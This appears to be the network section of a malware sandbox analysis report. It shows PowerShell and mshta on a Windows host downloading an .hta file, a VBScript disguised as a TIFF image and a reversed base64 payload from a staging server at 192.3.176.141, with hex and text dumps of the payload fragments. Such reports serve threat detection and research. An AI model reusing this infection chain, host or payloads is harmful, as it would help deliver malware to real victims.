Oct 25, 2024 19:50:49.146394968 CEST	908	IN	Data Raw: 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 33 41 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 Data Ascii: 20%2525252520%2525252520%252525253A%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
Oct 25, 2024 19:50:50.138230085 CEST	1236	IN	Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 Data Ascii: 5252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525
Oct 25, 2024 19:50:50.138545036 CEST	224	IN	Data Raw: 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 Data Ascii: 520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%
Oct 25, 2024 19:50:52.315826893 CEST	1236	IN	Data Raw: 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
Oct 25, 2024 19:50:52.315850973 CEST	1236	IN	Data Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49170	192.3.176.141	80	3944	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:08.097014904 CEST	371	OUT	GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 25, 2024 19:51:09.880809069 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 17:51:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 04:03:30 GMT ETag: "22090-6254533b72ace" Accept-Ranges: bytes Content-Length: 139408 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 69 00 63 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 [TRUNCATED] Data Ascii: private function CreateSession(wsman, conStr, optDic, estica) dim grafitarFlags dim conOpt dim grafitar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword grafitarFlags = 0 proxyAccessType =
Oct 25, 2024 19:51:09.881577969 CEST	224	IN	Data Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
Oct 25, 2024 19:51:10.252120018 CEST	1236	IN	Data Raw: 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 3d Data Ascii: proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA_ENCODI
Oct 25, 2024 19:51:10.252147913 CEST	1236	IN	Data Raw: 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54 Data Ascii: alid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if if op
Oct 25, 2024 19:51:10.252159119 CEST	448	IN	Data Raw: 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 27 00 2d 00 72 00 65 00 6d 00 6f 00 74 00 65 00 27 00 20 Data Ascii: only valid when used with the '-remote' option" grafitarFlags = grafitarFlags OR wsman.SessionFlagUseSsl e
Oct 25, 2024 19:51:10.388633966 CEST	1236	IN	Data Raw: 00 6c 00 20 00 3d 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: l = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case VAL_NO_AUTH grafit
Oct 25, 2024 19:51:10.388756990 CEST	1236	IN	Data Raw: 00 65 00 20 00 56 00 41 00 4c 00 5f 00 42 00 41 00 53 00 49 00 43 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 55 00 73 00 65 00 20 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61 Data Ascii: e VAL_BASIC 'Use -username and -password. ASSERTBOOL optDic.ArgumentExists(NPARA_USER
Oct 25, 2024 19:51:10.388770103 CEST	1236	IN	Data Raw: 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 Data Ascii: RNAME & "' option must be specified for '-auth:digest'" ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT)
Oct 25, 2024 19:51:10.388782024 CEST	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 4e 00 45 00 47 00 4f 00 54 00 49 00 41 00 54 00 45 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: case VAL_NEGOTIATE '-username and -password are optional. ASSERTBOOL not optDi
Oct 25, 2024 19:51:10.388792992 CEST	1236	IN	Data Raw: 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 Data Ascii: ntExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:certificate'" AS
Oct 25, 2024 19:51:10.388807058 CEST	1120	IN	Data Raw: 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 6d 00 75 00 73 00 74 00 20 Data Ascii: he '-" & NPARA_USERNAME & "' option must be specified for '-auth:credssp'" ASSERTBOOL not optDic.Argumen

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49171	192.3.176.141	80	3164	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:08.332019091 CEST	486	OUT	GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMT Connection: Keep-Alive Host: 192.3.176.141 If-None-Match: "33147-625456f86fad3"
Oct 25, 2024 19:51:08.991213083 CEST	275	IN	HTTP/1.1 304 Not Modified Date: Fri, 25 Oct 2024 17:51:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT ETag: "33147-625456f86fad3" Accept-Ranges: bytes Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49172	192.3.176.141	80	1488	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:14.152308941 CEST	371	OUT	GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 25, 2024 19:51:14.806427002 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 17:51:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 04:03:30 GMT ETag: "22090-6254533b72ace" Accept-Ranges: bytes Content-Length: 139408 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 69 00 63 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 [TRUNCATED] Data Ascii: private function CreateSession(wsman, conStr, optDic, estica) dim grafitarFlags dim conOpt dim grafitar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword grafitarFlags = 0 proxyAccessType =
Oct 25, 2024 19:51:14.806452990 CEST	224	IN	Data Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
Oct 25, 2024 19:51:14.806493044 CEST	1236	IN	Data Raw: 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 3d Data Ascii: proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA_ENCODI
Oct 25, 2024 19:51:14.806514978 CEST	1236	IN	Data Raw: 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54 Data Ascii: alid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if if op
Oct 25, 2024 19:51:14.806539059 CEST	1236	IN	Data Raw: 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 27 00 2d 00 72 00 65 00 6d 00 6f 00 74 00 65 00 27 00 20 Data Ascii: only valid when used with the '-remote' option" grafitarFlags = grafitarFlags OR wsman.SessionFlagUseSsl e
Oct 25, 2024 19:51:14.806608915 CEST	1236	IN	Data Raw: 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f Data Ascii: he '-" & NPARA_USERNAME & "' option is not valid for '-auth:none'" ASSERTBOOL not optDic.ArgumentExists(
Oct 25, 2024 19:51:14.806629896 CEST	1236	IN	Data Raw: 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 43 00 72 00 65 00 64 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 Data Ascii: ssionFlagCredUsernamePassword OR wsman.SessionFlagUseBasic case VAL_DIGEST 'Use -username a
Oct 25, 2024 19:51:14.806655884 CEST	1236	IN	Data Raw: 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for
Oct 25, 2024 19:51:14.806679964 CEST	1236	IN	Data Raw: 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 Data Ascii: SERTBOOL optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option must be specified for '-auth:certificate'"
Oct 25, 2024 19:51:14.806703091 CEST	1236	IN	Data Raw: 00 6e 00 61 00 6d 00 65 00 20 00 61 00 6e 00 64 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 2e 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 Data Ascii: name and -password. ASSERTBOOL osVersion >= osVista, "The specified '-" & NPARA_AUTH & "' flag '" & au
Oct 25, 2024 19:51:14.812040091 CEST	1236	IN	Data Raw: 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 20 00 26 00 20 00 22 00 27 00 20 00 66 00 6c 00 61 00 67 00 20 00 27 00 22 00 20 00 26 00 20 Data Ascii: pecified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value." end select end if if

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49175	192.3.176.141	80	3804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:43.964687109 CEST	77	OUT	GET /41/SMPLRTT.txt HTTP/1.1 Host: 192.3.176.141 Connection: Keep-Alive
Oct 25, 2024 19:51:45.704380035 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 17:51:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 03:50:09 GMT ETag: "22aac-6254503f09080" Accept-Ranges: bytes Content-Length: 141996 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.704396963 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.704408884 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.704454899 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.704467058 CEST	424	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.704479933 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
